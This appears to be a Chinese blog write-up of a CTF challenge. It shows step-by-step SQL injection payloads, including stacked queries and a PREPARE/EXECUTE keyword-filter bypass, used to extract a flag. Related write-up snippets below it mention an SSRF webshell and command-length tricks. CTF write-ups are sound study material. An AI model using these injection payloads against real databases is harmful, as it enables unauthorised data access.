bmzctf_强网杯 2019 随便注

最新推荐文章于 2022-04-24 19:36:08 发布
最新推荐文章于 2022-04-24 19:36:08 发布
阅读量161 收藏
点赞数 1
分类专栏: CTF 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44959263/article/details/120451075
版权
本文通过一系列测试步骤展示了如何发现并利用SQL注入漏洞,包括不同类型的输入测试、堆叠注入及特定命令执行等高级技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

直接访问目标地址,看到输入框,尝试任意输入

在这里插入图片描述

输入1’
在这里插入图片描述

输入1’ #返回正常,确认存在注入

在这里插入图片描述
输入1’ order by 2 # 返回正常
在这里插入图片描述

输入1’ order by 3 # 返回报错

在这里插入图片描述
再试着输入select测试返回点:1’ union select 1,2 #,发现select被过滤

在这里插入图片描述
尝试堆叠注入:1’;show databases; #

在这里插入图片描述
输入 1’;show tables; #

在这里插入图片描述

输入 1’;show columns from flagg#

在这里插入图片描述
输入 -1’;use supersqli;set @sql=concat(‘s’,'elect flag from flagg');PREPARE BMZ FROM @sql;EXECUTE BMZ;#

在这里插入图片描述

成功得到flag!

BMZCTF 强网 2019 随便
qq_26243045的博客
11-29 466
考点:sql入、二次入 打开页,是一个输入框: 输入1,并提交: 看到返回数组,测试是否存在入点:输入1‘ 返回报错。 输入1‘ # 返回正常 尝试手工入: 1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。 再试着输入select测试返回点:1’ union select 1,2 # 看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli 尝试堆叠入 输入:1’; s
BMZCTF 山东省大学生络技术大赛-baby
qq_26243045的博客
12-03 830
下载附件,是一个脚本文件: ``` # -*- coding: utf-8 -*- from Crypto.PublicKey import RSA import libnum import uuid flag = "flag{***************}" rsa = RSA.generate(4096,e=3) p = rsa.p d = rsa.d e = rsa.e N = rsa.n m = libnum.s2n(flag) c = pow(m, e, N..
BMZCTF——web(hctf、随便、ezeval)
LizePing_的博客
07-06 695
BMZCTF——webhctf_2018_warmup做题思路强网 2019 随便做题思路三级目录 hctf_2018_warmup 做题思路 打开题目链接,F12查看元素,看到释有source.php,访问看看 访问目录得到一个php代码,不妨看一看他要表达什么。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page)
buuctf-随便
xixihahawuwu的博客
11-23 307
上没有什么提示,进入环境 有一个提交查询,点击查询,数字为1时回显如下 数字为2回显如下,且文本框内数字自动变为1 当数字大于2时,页面不会返回内容。说明字段数为2 看下源码 咳咳,这就过分了哈.我偏要用 先试下’ 再select下 回显了关键字的过滤,union入没法用 这里有一个知识点就是“堆积入” 其实就是加了;之后接着1’;show databases;爆下数据库 再爆个表 好啊。尝试下把表内容爆出来 1’;show columns from words; 没啥有用的 下一个,这
BMZCTF Ook
qq_26243045的博客
12-03 504
下载附件,是一个文件文件,打开后都是OoK的编码, 打开https://www.splitbrain.org/services/ook,输入密文,选择Ook to text 就可以得到flag
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 722
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
二、BMZCTF-[easy_php]-[本地复现]-[简单的代码审计]
qwsn
01-01 2318
1.addslashes($string):对字符串参数中的预定义字符进行转义,并返回转义后的字符串 2.__DIR__:取出当前脚本执行的物理路径 3.PD9waHAKJExBTkdbJ21lbWJlcl9tYW5hZ2UnXSA9ICdhZG1pbic7Cj8+Cg== <?php $LANG['member_manage'] = 'admin'; ?> 4.file_get_contents — 将整个文件读入一个字符串 5.file_put_contents — 将一个字符串写入
BMZCTF baby_dsa
qq_26243045的博客
12-03 702
DSA完全不懂,现学,相关知识如下链接: https://www.jarvisw.com/?p=169 用大佬的脚本: from Crypto.Util.number import * from hashlib import sha512,md5 def hash(message): return int(sha512(message).hexdigest(), 16) def sign(message, pubkey, privkey, random1): p, q, g,...
BMZCTF Traffic_Light
qq_26243045的博客
11-29 1099
下载附件,打开后是一张gif动图。内容是一个红绿灯 对图片进行分解 得到1688张图片 观察图片: 1、发现第2的倍数的图片都是没有灯亮的。忽略不计。 2、绿灯和红灯总和为8或8的倍数时,下一张一定是黄色。 由此可以推断为二进制。绿为1,红为0,黄为空格。 写脚本进行编码: # -*-coding: utf-8 -*- from PIL import Image binstr = "" flag = "" def decode(s): return ''.join([chr(i) for
BMZCTF(泰湖-MISC)
qq_46540840的博客
01-29 1050
BMZCTF(泰湖-MISC)用到的方法1.zip伪加密2.docx文档文字的隐藏3.希尔密码加密4.Rabbit加密5.音频分析 用到的方法 1.zip伪加密 首先一个是加密的压缩包 一个是还处在带解密的doc文档。那么一种假设的线索就有了从doc文档中提取密码,来解压缩包。另一种假设是从压缩包解开来作为提取doc文档的密码.不过一般都是前者居多。 先从最外层开始最简单的就是zip的伪加密了 用 ZipCenOp.jar 一试便知 用法 java -jar ZipCenOp.jar r +需要解密的压缩
BMZCTF:533
末初 · mochu7
01-22 461
http://bmzclub.cn/challenges#533 password000000000-999999999.zip 根据文件名提示,使用ARCHPR爆破password000000000-999999999.zip密码为9位数 压缩包密码为:548751269 得到533.zip 很明显可以直接通过CRC爆破文件内容,因为内容很小,但是这里1.txt是5字节的,2.txt和3.txt是3字节的,这个需要意下,我们先把2.txt和3.txt的内容爆破出来,利用我的这篇文章中的三字节爆破
BMZCTF:oldmodem
末初 · mochu7
12-21 782
http://bmzclub.cn/challenges#oldmodem 使用file命令查看下,发现是wav文件 但是修改后缀为wav后缀后并没有看出什么也没听出什么 然后根据题目名称得知这是modem文件,装个minimoden去识别这个文件 直接kali中:sudo apt-get install minimodem 这个题目原来还有个提示没给就是这个modem文件的标准是:Bell202 minimodem -r -f encoded 1200 GACTF{9621827f-a41b-
BMZCTF-端午彩蛋-纪念屈原
Crazy198410的博客
06-16 625
rar 下载附件,查看文件头部,是一个rar的压缩包。 改后缀解压,需要密码,看到压缩包提示:屈原的姓、氏、名、字分别为哪四个字?拼接起来md5加密后即为解压密码 查看百度:屈原(约公元前340—公元前278年),芈姓,屈氏,名平,字原, 组合芈屈平原,写脚本进行md5编码: import hashlib s1 = '芈屈平原'.encode('utf-8') x=hashlib.md5(s1).hexdigest() print(x) 得到密码:16ccb09f96f27af192f541992560
BMZCTF rcee
qq_26243045的博客
11-29 436
考点:代码审计、Shell命令 打开页,可以看到源码 存在命令执行,但要求长度小于8。 首先寻找flag。先在根目录下寻找:输入`?command=ls /` 可以看到flag就在根目录下。 进行访问: 没有回显。因为空格被处理成`%20`,当成3个字符,要执行的命令长度超过8了。 使用`*`代替,输入:`?command=cat /f*` 可以看到,把f开关的所有文件内容都显示了出来。也可以看到flag ...
BMZCTF (持续更新)
zip471642048的博客
04-24 439
文章目录真正的CTFer 真正的CTFer 调整高度可以得到完整的图像大小
BMZCTF ssrfme
qq_26243045的博客
11-28 638
考点:ssrf 打开题目发现程序会将$url中获取的数据保存在我们自定义的文件名中,而且$url必须是http://127.0.0.1/开头。 但是程序在执行成功后会把$path给返回一下,结合上述内容。这道题我们可以控制程序去获取返回结果页面的代码,然后保存到php文件中。返回的$path我们设置成一句话木马。 最终payload http://www.bmzclub.cn:20001/?file=http://127.0.0.1/?file=http://127.0.0.1/ind..
BMZCTF 真正的CTFer
m0_63253040的博客
03-10 749
下载CTFer.zip,里面还有个压缩包 压缩包里面只有一张图片 没有看见flag,我一般习惯先找属性,但是没有,再看010,也没看见特殊点,最后放到kali里的时候打开图片发现有crc错误,一般碰到这个是要改宽高,但是我还是用binwalk扫了下,发现没有什么 所以返回010去改,但是我发现只要一改宽,图片直接被损坏无法看,那就只改高把,最后是改到5000,16进制转换就是1388 这里因为我眼睛不好,真的真的看不见flag就在图片上 下次还是要仔细看图片 fl
BMZCTF:memory
末初 · mochu7
12-13 1280
http://bmzclub.cn/challenges#memory 题目描述.txt 分析内存镜像,破解管理员的登录密码,flag为明文密码的MD5值 把内存中所有用户的hash全部dump出来 存为文件,使用john进行爆破 得到Administrator账户密码:12345678 PS C:\Users\Administrator> php -r "var_dump(md5('12345678'));" Command line code:1: string(32) "25d55a
[BMZCTF]-zonghe
cjdgg的博客
05-25 167
[BMZCTF]-zonghe 这题进去就是登录界面 随便册一个用户登录进去,能点的也就用户资料这里,试了一下没啥有用的 这个时候又看到了url,又很像任意文件读取 试试读/etc/passwd 再试试/flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值